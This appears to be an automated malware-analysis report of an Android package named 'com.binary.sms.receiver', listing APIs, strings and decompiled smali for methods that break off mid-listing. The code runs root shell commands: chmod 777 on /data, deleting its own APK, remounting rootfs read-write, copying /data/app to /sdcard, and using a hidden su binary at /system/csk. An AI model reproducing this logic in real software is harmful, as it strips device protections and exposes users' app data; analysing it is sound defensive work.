    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.io.DataOutputStream.close
    • java.lang.Process.destroy
    • com.binary.sms.receiver.SkeletonActivity.access$0
    • android.widget.EditText.setText
    • com.binary.sms.receiver.SkeletonActivity.copyDataData
    • java.lang.StringBuilder.<init>
    • java.lang.Exception.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • java.lang.Exception.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    Strings
    • /data/app/
    • -1.apk
    • chmod 777 /data/
    • chmod 777 /data/app/
    • chmod 777
    • rm
    • exit\n
    • systemCall Succesfule
    • finished kill....
    • /data/app
    • command:
    • \n
    • systemCall Exception
    • systemCall finaly
    Position Instruction Meta Information
    0.param p1, "suComand" # Ljava/lang/String;
    1.prologue
    2move-object/from16 v0, p0
    4iget-object v12, v0, Lcom/binary/sms/receiver/SkeletonActivity$8;->this$0:Lcom/binary/sms/receiver/SkeletonActivity;
    6invoke-virtual {v12}, Lcom/binary/sms/receiver/SkeletonActivity;->getApplicationContext()Landroid/content/Context;
    7move-result-object v12
    9invoke-virtual {v12}, Landroid/content/Context;->getPackageName()Ljava/lang/String;
    10move-result-object v1
    11new-instance v12, Ljava/lang/StringBuilder;
    13const-string v13, "/data/app/"
    15invoke-direct {v12, v13}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    16move-object/from16 v0, p0
    18iget-object v13, v0, Lcom/binary/sms/receiver/SkeletonActivity$8;->this$0:Lcom/binary/sms/receiver/SkeletonActivity;
    20invoke-virtual {v13}, Lcom/binary/sms/receiver/SkeletonActivity;->getApplicationContext()Landroid/content/Context;
    21move-result-object v13
    23invoke-virtual {v13}, Landroid/content/Context;->getPackageName()Ljava/lang/String;
    24move-result-object v13
    26invoke-virtual {v12, v13}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    27move-result-object v12
    29const-string v13, "-1.apk"
    31invoke-virtual {v12, v13}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    32move-result-object v12
    34invoke-virtual {v12}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    35move-result-object v2
    36const/4 v12, 0x4
    37new-array v3, v12, [Ljava/lang/String;
    38const/4 v12, 0x0
    40const-string v13, "chmod 777 /data/"
    41aput-object v13, v3, v12
    42const/4 v12, 0x1
    44const-string v13, "chmod 777 /data/app/"
    45aput-object v13, v3, v12
    46const/4 v12, 0x2
    47new-instance v13, Ljava/lang/StringBuilder;
    49const-string v14, "chmod 777 "
    51invoke-direct {v13, v14}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    53invoke-virtual {v13, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    54move-result-object v13
    56invoke-virtual {v13}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    57move-result-object v13
    58aput-object v13, v3, v12
    59const/4 v12, 0x3
    60new-instance v13, Ljava/lang/StringBuilder;
    62const-string v14, "rm "
    64invoke-direct {v13, v14}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    66invoke-virtual {v13, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    67move-result-object v13
    69invoke-virtual {v13}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    70move-result-object v13
    71aput-object v13, v3, v12
    72const/4 v7, 0x0
    73const/4 v5, 0x1
    74const/4 v10, 0x0
    75const/4 v8, 0x0
    76try_start_62:
    77invoke-static {}, Ljava/lang/Runtime;->getRuntime()Ljava/lang/Runtime;
    78move-result-object v12
    79move-object/from16 v0, p1
    81invoke-virtual {v12, v0}, Ljava/lang/Runtime;->exec(Ljava/lang/String;)Ljava/lang/Process;
    82move-result-object v10
    83new-instance v9, Ljava/io/DataOutputStream;
    85invoke-virtual {v10}, Ljava/lang/Process;->getOutputStream()Ljava/io/OutputStream;
    86move-result-object v12
    88invoke-direct {v9, v12}, Ljava/io/DataOutputStream;-><init>(Ljava/io/OutputStream;)V
    89try_end_75: if-eqz v3, :cond_7d
    90try_start_77: array-length v13, v3
    91const/4 v12, 0x0
    92move v6, v5
    93goto_7a: if-lt v12, v13, :cond_bb
    94move v5, v6
    95cond_7d:
    96const-string v12, "exit\n"
    98invoke-virtual {v9, v12}, Ljava/io/DataOutputStream;->writeBytes(Ljava/lang/String;)V
    100invoke-virtual {v9}, Ljava/io/DataOutputStream;->flush()V
    102invoke-static {}, Ljava/lang/Thread;->currentThread()Ljava/lang/Thread;
    103const-wide/16 v12, 0xbb8
    105invoke-static {v12, v13}, Ljava/lang/Thread;->sleep(J)V
    107invoke-virtual {v10}, Ljava/lang/Process;->waitFor()I
    109invoke-static {}, Landroid/os/Message;->obtain()Landroid/os/Message;
    110move-result-object v7
    111const/4 v12, 0x0
    112iput v12, v7, Landroid/os/Message;->arg1:I
    113const/4 v12, 0x0
    114iput v12, v7, Landroid/os/Message;->arg2:I
    116const-string v12, "systemCall Succesfule"
    118invoke-static {v12}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    119try_end_9f: if-eqz v9, :cond_a4
    120try_start_a1:
    121invoke-virtual {v9}, Ljava/io/DataOutputStream;->close()V
    122cond_a4:
    123invoke-virtual {v10}, Ljava/lang/Process;->destroy()V
    124move-object/from16 v0, p0
    126iget-object v12, v0, Lcom/binary/sms/receiver/SkeletonActivity$8;->this$0:Lcom/binary/sms/receiver/SkeletonActivity;
    128invoke-static {v12}, Lcom/binary/sms/receiver/SkeletonActivity;->access$0(Lcom/binary/sms/receiver/SkeletonActivity;)Landroid/widget/EditText;
    129move-result-object v12
    131const-string v13, "finished kill...."
    133invoke-virtual {v12, v13}, Landroid/widget/EditText;->setText(Ljava/lang/CharSequence;)V
    135const-string v12, "/data/app"
    137invoke-static {v12}, Lcom/binary/sms/receiver/SkeletonActivity;->copyDataData(Ljava/lang/String;)V
    138goto_b9: move-object v8, v9
    139goto_ba: return-void
    140try_start_bb: aget-object v11, v3, v12
    141new-instance v14, Ljava/lang/StringBuilder;
    143const-string v15, "command: "
    145invoke-direct {v14, v15}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    147invoke-virtual {v14, v11}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    148move-result-object v14
    150invoke-virtual {v14}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    151move-result-object v14
    153invoke-static {v14}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    154new-instance v14, Ljava/lang/StringBuilder;
    156invoke-static {v11}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;
    157move-result-object v15
    159invoke-direct {v14, v15}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    161const-string v15, "\n"
    163invoke-virtual {v14, v15}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    164move-result-object v14
    166invoke-virtual {v14}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    167move-result-object v14
    169invoke-virtual {v9, v14}, Ljava/io/DataOutputStream;->writeBytes(Ljava/lang/String;)V
    171invoke-virtual {v9}, Ljava/io/DataOutputStream;->flush()V
    173invoke-static {}, Landroid/os/Message;->obtain()Landroid/os/Message;
    174try_end_eb: move-result-object v7
    175add-int/lit8 v5, v6, 0x1
    176try_start_ee: iput v6, v7, Landroid/os/Message;->arg1:I
    177const/4 v14, -0x1
    178iput v14, v7, Landroid/os/Message;->arg2:I
    179try_end_f3: add-int/lit8 v12, v12, 0x1
    180move v6, v5
    181goto/16 :goto_7a
    182catch_f7: move-exception v4
    183try_start_f8:
    184invoke-static {}, Landroid/os/Message;->obtain()Landroid/os/Message;
    185move-result-object v7
    186const/4 v12, 0x1
    187iput v12, v7, Landroid/os/Message;->arg1:I
    188const/4 v12, 0x0
    189iput v12, v7, Landroid/os/Message;->arg2:I
    190new-instance v12, Ljava/lang/StringBuilder;
    192const-string v13, "systemCall Exception"
    194invoke-direct {v12, v13}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    196invoke-virtual {v4}, Ljava/lang/Exception;->getMessage()Ljava/lang/String;
    197move-result-object v13
    199invoke-virtual {v12, v13}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    200move-result-object v12
    202invoke-virtual {v12}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    203move-result-object v12
    205invoke-static {v12, v4}, Lcom/binary/sms/receiver/Logger;->error(Ljava/lang/String;Ljava/lang/Throwable;)V
    206try_end_118: if-eqz v8, :cond_11d
    207try_start_11a:
    208invoke-virtual {v8}, Ljava/io/DataOutputStream;->close()V
    209cond_11d:
    210invoke-virtual {v10}, Ljava/lang/Process;->destroy()V
    211move-object/from16 v0, p0
    213iget-object v12, v0, Lcom/binary/sms/receiver/SkeletonActivity$8;->this$0:Lcom/binary/sms/receiver/SkeletonActivity;
    215invoke-static {v12}, Lcom/binary/sms/receiver/SkeletonActivity;->access$0(Lcom/binary/sms/receiver/SkeletonActivity;)Landroid/widget/EditText;
    216move-result-object v12
    218const-string v13, "finished kill...."
    220invoke-virtual {v12, v13}, Landroid/widget/EditText;->setText(Ljava/lang/CharSequence;)V
    222const-string v12, "/data/app"
    224invoke-static {v12}, Lcom/binary/sms/receiver/SkeletonActivity;->copyDataData(Ljava/lang/String;)V
    225try_end_132: goto/16 :goto_ba
    226catch_133: move-exception v4
    227new-instance v12, Ljava/lang/StringBuilder;
    229const-string v13, "systemCall finaly"
    231invoke-direct {v12, v13}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    233invoke-virtual {v4}, Ljava/lang/Exception;->getMessage()Ljava/lang/String;
    234move-result-object v13
    236invoke-virtual {v12, v13}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    237move-result-object v12
    239invoke-virtual {v12}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    240move-result-object v12
    242invoke-static {v12, v4}, Lcom/binary/sms/receiver/Logger;->error(Ljava/lang/String;Ljava/lang/Throwable;)V
    243goto/16 :goto_ba
    244catchall_14c: move-exception v12
    245goto_14d: if-eqz v8, :cond_152
    246try_start_14f:
    247invoke-virtual {v8}, Ljava/io/DataOutputStream;->close()V
    248cond_152:
    249invoke-virtual {v10}, Ljava/lang/Process;->destroy()V
    250move-object/from16 v0, p0
    252iget-object v13, v0, Lcom/binary/sms/receiver/SkeletonActivity$8;->this$0:Lcom/binary/sms/receiver/SkeletonActivity;
    254invoke-static {v13}, Lcom/binary/sms/receiver/SkeletonActivity;->access$0(Lcom/binary/sms/receiver/SkeletonActivity;)Landroid/widget/EditText;
    255move-result-object v13
    257const-string v14, "finished kill...."
    259invoke-virtual {v13, v14}, Landroid/widget/EditText;->setText(Ljava/lang/CharSequence;)V
    261const-string v13, "/data/app"
    263invoke-static {v13}, Lcom/binary/sms/receiver/SkeletonActivity;->copyDataData(Ljava/lang/String;)V
    264try_end_167: throw v12
    265catch_168: move-exception v4
    266new-instance v13, Ljava/lang/StringBuilder;
    268const-string v14, "systemCall finaly"
    270invoke-direct {v13, v14}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    272invoke-virtual {v4}, Ljava/lang/Exception;->getMessage()Ljava/lang/String;
    273move-result-object v14
    275invoke-virtual {v13, v14}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    276move-result-object v13
    278invoke-virtual {v13}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    279move-result-object v13
    281invoke-static {v13, v4}, Lcom/binary/sms/receiver/Logger;->error(Ljava/lang/String;Ljava/lang/Throwable;)V
    282goto/16 :goto_167
    283catch_180: move-exception v4
    284new-instance v12, Ljava/lang/StringBuilder;
    286const-string v13, "systemCall finaly"
    288invoke-direct {v12, v13}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    290invoke-virtual {v4}, Ljava/lang/Exception;->getMessage()Ljava/lang/String;
    291move-result-object v13
    293invoke-virtual {v12, v13}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    294move-result-object v12
    296invoke-virtual {v12}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    297move-result-object v12
    299invoke-static {v12, v4}, Lcom/binary/sms/receiver/Logger;->error(Ljava/lang/String;Ljava/lang/Throwable;)V
    300goto/16 :goto_b9
    301catchall_199: move-exception v12
    302move-object v8, v9
    303goto/16 :goto_14d
    304catchall_19c: move-exception v12
    305move-object v8, v9
    306move v5, v6
    307goto/16 :goto_14d
    308catch_1a0: move-exception v4
    309move-object v8, v9
    310goto/16 :goto_f8
    311catch_1a4: move-exception v4
    312move-object v8, v9
    313move v5, v6
    314goto/16 :goto_f8
    Cross References
    APIs
    • com.binary.sms.receiver.SkeletonActivity.getDataFileList
    • java.util.List.add
    • java.util.List.add
    • java.util.List.size
    • java.util.List.toArray
    • java.lang.Runtime.getRuntime
    • java.lang.Runtime.exec
    • java.lang.Process.getOutputStream
    • java.io.DataOutputStream.<init>
    • java.io.DataOutputStream.writeBytes
    • java.io.DataOutputStream.flush
    • java.lang.Thread.currentThread
    • java.lang.Thread.sleep
    • java.lang.Process.waitFor
    • android.os.Message.obtain
    • java.io.DataOutputStream.close
    • java.lang.Process.destroy
    • java.io.File.<init>
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.System.currentTimeMillis
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.io.File.<init>
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.String.valueOf
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.io.DataOutputStream.writeBytes
    • java.io.DataOutputStream.flush
    • android.os.Message.obtain
    • android.os.Message.obtain
    • java.lang.StringBuilder.<init>
    • java.lang.Exception.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.io.DataOutputStream.close
    • java.lang.Process.destroy
    • java.io.File.<init>
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.System.currentTimeMillis
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.io.File.<init>
    • java.lang.StringBuilder.<init>
    • java.lang.Exception.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.io.DataOutputStream.close
    • java.lang.Process.destroy
    • java.io.File.<init>
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.System.currentTimeMillis
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.io.File.<init>
    • java.lang.StringBuilder.<init>
    • java.lang.Exception.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • java.lang.Exception.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    Strings
    • mount -orw,remount rootfs /
    • mount -oro,remount rootfs /
    • exit\n
    • systemCall Succesfule
    • /sdcard/
    • command:
    • \n
    • systemCall Exception
    • systemCall finaly
    Position Instruction Meta Information
    0.param p1, "suComand" # Ljava/lang/String;
    1.param p2, "commands" # [Ljava/lang/String;
    2.param p3, "source" # Ljava/lang/String;
    3.prologue
    5invoke-static/range {p3 .. p3}, Lcom/binary/sms/receiver/SkeletonActivity;->getDataFileList(Ljava/lang/String;)Ljava/util/List;
    6move-result-object v1
    7const/4 v10, 0x0
    9const-string v11, "mount -orw,remount rootfs /"
    11invoke-interface {v1, v10, v11}, Ljava/util/List;->add(ILjava/lang/Object;)V
    13const-string v10, "mount -oro,remount rootfs /"
    15invoke-interface {v1, v10}, Ljava/util/List;->add(Ljava/lang/Object;)Z
    17invoke-interface {v1}, Ljava/util/List;->size()I
    18move-result v10
    19new-array v10, v10, [Ljava/lang/String;
    21invoke-interface {v1, v10}, Ljava/util/List;->toArray([Ljava/lang/Object;)[Ljava/lang/Object;
    22move-result-object p2
    23check-cast p2, [Ljava/lang/String;
    24const/4 v5, 0x0
    25const/4 v3, 0x1
    26const/4 v8, 0x0
    27const/4 v6, 0x0
    28try_start_1f:
    29invoke-static {}, Ljava/lang/Runtime;->getRuntime()Ljava/lang/Runtime;
    30move-result-object v10
    31move-object/from16 v0, p1
    33invoke-virtual {v10, v0}, Ljava/lang/Runtime;->exec(Ljava/lang/String;)Ljava/lang/Process;
    34move-result-object v8
    35new-instance v7, Ljava/io/DataOutputStream;
    37invoke-virtual {v8}, Ljava/lang/Process;->getOutputStream()Ljava/io/OutputStream;
    38move-result-object v10
    40invoke-direct {v7, v10}, Ljava/io/DataOutputStream;-><init>(Ljava/io/OutputStream;)V
    41try_end_32: if-eqz p2, :cond_3c
    42try_start_34: move-object/from16 v0, p2
    43array-length v11, v0
    44const/4 v10, 0x0
    45move v4, v3
    46goto_39: if-lt v10, v11, :cond_90
    47move v3, v4
    48cond_3c:
    49const-string v10, "exit\n"
    51invoke-virtual {v7, v10}, Ljava/io/DataOutputStream;->writeBytes(Ljava/lang/String;)V
    53invoke-virtual {v7}, Ljava/io/DataOutputStream;->flush()V
    55invoke-static {}, Ljava/lang/Thread;->currentThread()Ljava/lang/Thread;
    56const-wide/16 v10, 0xbb8
    58invoke-static {v10, v11}, Ljava/lang/Thread;->sleep(J)V
    60invoke-virtual {v8}, Ljava/lang/Process;->waitFor()I
    62invoke-static {}, Landroid/os/Message;->obtain()Landroid/os/Message;
    63move-result-object v5
    64const/4 v10, 0x0
    65iput v10, v5, Landroid/os/Message;->arg1:I
    66const/4 v10, 0x0
    67iput v10, v5, Landroid/os/Message;->arg2:I
    69const-string v10, "systemCall Succesfule"
    71invoke-static {v10}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    72try_end_5e: if-eqz v7, :cond_63
    73try_start_60:
    74invoke-virtual {v7}, Ljava/io/DataOutputStream;->close()V
    75cond_63:
    76invoke-virtual {v8}, Ljava/lang/Process;->destroy()V
    77new-instance v10, Ljava/io/File;
    78move-object/from16 v0, p3
    80invoke-direct {v10, v0}, Ljava/io/File;-><init>(Ljava/lang/String;)V
    81new-instance v11, Ljava/io/File;
    82new-instance v12, Ljava/lang/StringBuilder;
    84const-string v13, "/sdcard/"
    86invoke-direct {v12, v13}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    87move-object/from16 v0, p3
    89invoke-virtual {v12, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    90move-result-object v12
    92invoke-static {}, Ljava/lang/System;->currentTimeMillis()J
    93move-result-wide v13
    95invoke-virtual {v12, v13, v14}, Ljava/lang/StringBuilder;->append(J)Ljava/lang/StringBuilder;
    96move-result-object v12
    98invoke-virtual {v12}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    99move-result-object v12
    101invoke-direct {v11, v12}, Ljava/io/File;-><init>(Ljava/lang/String;)V
    103invoke-static {v10, v11}, Lcom/binary/sms/receiver/SystemUtils;->copyFiles(Ljava/io/File;Ljava/io/File;)V
    104goto_8e: move-object v6, v7
    105goto_8f: return-void
    106cond_90: aget-object v9, p2, v10
    107new-instance v12, Ljava/lang/StringBuilder;
    109const-string v13, "command: "
    111invoke-direct {v12, v13}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    113invoke-virtual {v12, v9}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    114move-result-object v12
    116invoke-virtual {v12}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    117move-result-object v12
    119invoke-static {v12}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    120new-instance v12, Ljava/lang/StringBuilder;
    122invoke-static {v9}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;
    123move-result-object v13
    125invoke-direct {v12, v13}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    127const-string v13, "\n"
    129invoke-virtual {v12, v13}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    130move-result-object v12
    132invoke-virtual {v12}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    133move-result-object v12
    135invoke-virtual {v7, v12}, Ljava/io/DataOutputStream;->writeBytes(Ljava/lang/String;)V
    137invoke-virtual {v7}, Ljava/io/DataOutputStream;->flush()V
    139invoke-static {}, Landroid/os/Message;->obtain()Landroid/os/Message;
    140try_end_c0: move-result-object v5
    141add-int/lit8 v3, v4, 0x1
    142try_start_c3: iput v4, v5, Landroid/os/Message;->arg1:I
    143const/4 v12, -0x1
    144iput v12, v5, Landroid/os/Message;->arg2:I
    145try_end_c8: add-int/lit8 v10, v10, 0x1
    146move v4, v3
    147goto/16 :goto_39
    148catch_cd: move-exception v2
    149goto_ce:
    150invoke-static {}, Landroid/os/Message;->obtain()Landroid/os/Message;
    151move-result-object v5
    152const/4 v10, 0x1
    153iput v10, v5, Landroid/os/Message;->arg1:I
    154const/4 v10, 0x0
    155iput v10, v5, Landroid/os/Message;->arg2:I
    156new-instance v10, Ljava/lang/StringBuilder;
    158const-string v11, "systemCall Exception"
    160invoke-direct {v10, v11}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    162invoke-virtual {v2}, Ljava/lang/Exception;->getMessage()Ljava/lang/String;
    163move-result-object v11
    165invoke-virtual {v10, v11}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    166move-result-object v10
    168invoke-virtual {v10}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    169move-result-object v10
    171invoke-static {v10, v2}, Lcom/binary/sms/receiver/Logger;->error(Ljava/lang/String;Ljava/lang/Throwable;)V
    172try_end_ee: if-eqz v6, :cond_f3
    173try_start_f0:
    174invoke-virtual {v6}, Ljava/io/DataOutputStream;->close()V
    175cond_f3:
    176invoke-virtual {v8}, Ljava/lang/Process;->destroy()V
    177new-instance v10, Ljava/io/File;
    178move-object/from16 v0, p3
    180invoke-direct {v10, v0}, Ljava/io/File;-><init>(Ljava/lang/String;)V
    181new-instance v11, Ljava/io/File;
    182new-instance v12, Ljava/lang/StringBuilder;
    184const-string v13, "/sdcard/"
    186invoke-direct {v12, v13}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    187move-object/from16 v0, p3
    189invoke-virtual {v12, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    190move-result-object v12
    192invoke-static {}, Ljava/lang/System;->currentTimeMillis()J
    193move-result-wide v13
    195invoke-virtual {v12, v13, v14}, Ljava/lang/StringBuilder;->append(J)Ljava/lang/StringBuilder;
    196move-result-object v12
    198invoke-virtual {v12}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    199move-result-object v12
    201invoke-direct {v11, v12}, Ljava/io/File;-><init>(Ljava/lang/String;)V
    203invoke-static {v10, v11}, Lcom/binary/sms/receiver/SystemUtils;->copyFiles(Ljava/io/File;Ljava/io/File;)V
    204try_end_11e: goto/16 :goto_8f
    205catch_120: move-exception v2
    206new-instance v10, Ljava/lang/StringBuilder;
    208const-string v11, "systemCall finaly"
    210invoke-direct {v10, v11}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    212invoke-virtual {v2}, Ljava/lang/Exception;->getMessage()Ljava/lang/String;
    213move-result-object v11
    215invoke-virtual {v10, v11}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    216move-result-object v10
    218invoke-virtual {v10}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    219move-result-object v10
    221invoke-static {v10, v2}, Lcom/binary/sms/receiver/Logger;->error(Ljava/lang/String;Ljava/lang/Throwable;)V
    222goto/16 :goto_8f
    223catchall_139: move-exception v10
    224goto_13a: if-eqz v6, :cond_13f
    225try_start_13c:
    226invoke-virtual {v6}, Ljava/io/DataOutputStream;->close()V
    227cond_13f:
    228invoke-virtual {v8}, Ljava/lang/Process;->destroy()V
    229new-instance v11, Ljava/io/File;
    230move-object/from16 v0, p3
    232invoke-direct {v11, v0}, Ljava/io/File;-><init>(Ljava/lang/String;)V
    233new-instance v12, Ljava/io/File;
    234new-instance v13, Ljava/lang/StringBuilder;
    236const-string v14, "/sdcard/"
    238invoke-direct {v13, v14}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    239move-object/from16 v0, p3
    241invoke-virtual {v13, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    242move-result-object v13
    244invoke-static {}, Ljava/lang/System;->currentTimeMillis()J
    245move-result-wide v14
    247invoke-virtual {v13, v14, v15}, Ljava/lang/StringBuilder;->append(J)Ljava/lang/StringBuilder;
    248move-result-object v13
    250invoke-virtual {v13}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    251move-result-object v13
    253invoke-direct {v12, v13}, Ljava/io/File;-><init>(Ljava/lang/String;)V
    255invoke-static {v11, v12}, Lcom/binary/sms/receiver/SystemUtils;->copyFiles(Ljava/io/File;Ljava/io/File;)V
    256goto_16a: throw v10
    257catch_16b: move-exception v2
    258new-instance v11, Ljava/lang/StringBuilder;
    260const-string v12, "systemCall finaly"
    262invoke-direct {v11, v12}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    264invoke-virtual {v2}, Ljava/lang/Exception;->getMessage()Ljava/lang/String;
    265move-result-object v12
    267invoke-virtual {v11, v12}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    268move-result-object v11
    270invoke-virtual {v11}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    271move-result-object v11
    273invoke-static {v11, v2}, Lcom/binary/sms/receiver/Logger;->error(Ljava/lang/String;Ljava/lang/Throwable;)V
    274goto/16 :goto_16a
    275catch_183: move-exception v2
    276new-instance v10, Ljava/lang/StringBuilder;
    278const-string v11, "systemCall finaly"
    280invoke-direct {v10, v11}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    282invoke-virtual {v2}, Ljava/lang/Exception;->getMessage()Ljava/lang/String;
    283move-result-object v11
    285invoke-virtual {v10, v11}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    286move-result-object v10
    288invoke-virtual {v10}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    289move-result-object v10
    291invoke-static {v10, v2}, Lcom/binary/sms/receiver/Logger;->error(Ljava/lang/String;Ljava/lang/Throwable;)V
    292goto/16 :goto_8e
    293catchall_19c: move-exception v10
    294move-object v6, v7
    295goto/16 :goto_13a
    296catchall_19f: move-exception v10
    297move-object v6, v7
    298move v3, v4
    299goto/16 :goto_13a
    300catch_1a3: move-exception v2
    301move-object v6, v7
    302goto/16 :goto_ce
    303catch_1a7: move-exception v2
    304move-object v6, v7
    305move v3, v4
    306goto/16 :goto_ce
    APIs
    • java.io.File.<init>
    • java.io.File.exists
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.Runtime.getRuntime
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.Runtime.exec
    • com.binary.sms.receiver.SkeletonActivity.WaitForTimeout
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.Process.destroy
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.append
    • java.util.concurrent.TimeoutException.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.Process.destroy
    • java.lang.StringBuilder.<init>
    • java.lang.Exception.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.Process.destroy
    • java.lang.StringBuilder.<init>
    • java.lang.Throwable.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.Process.destroy
    • java.lang.Process.destroy
    Strings
    • /system/csk
    • runProcess my su does not exists. returning
    • filePath-
    • :
    • export LD_LIBRARY_PATH=/vendor/lib:/system/lib; chmod 777
    • command:
    • runProcess start (synchronized)
    • . command:
    • export LD_LIBRARY_PATH=/vendor/lib:/system/lib;
    • runProcess cmd=
    • success:
    • fail:
    • timeout=
    • runProcess Exception-
    • runProcess Throwable-
    Position Instruction Meta Information
    0.param p1, "filePath" # Ljava/lang/String;
    1.annotation system Ldalvik/annotation/Throws;
    2value = {
    3Ljava/lang/Exception;
    4}
    5.end annotation
    6.prologue
    7monitor-enter p0
    8try_start_1: new-instance v5, Ljava/io/File;
    10const-string v6, "/system/csk"
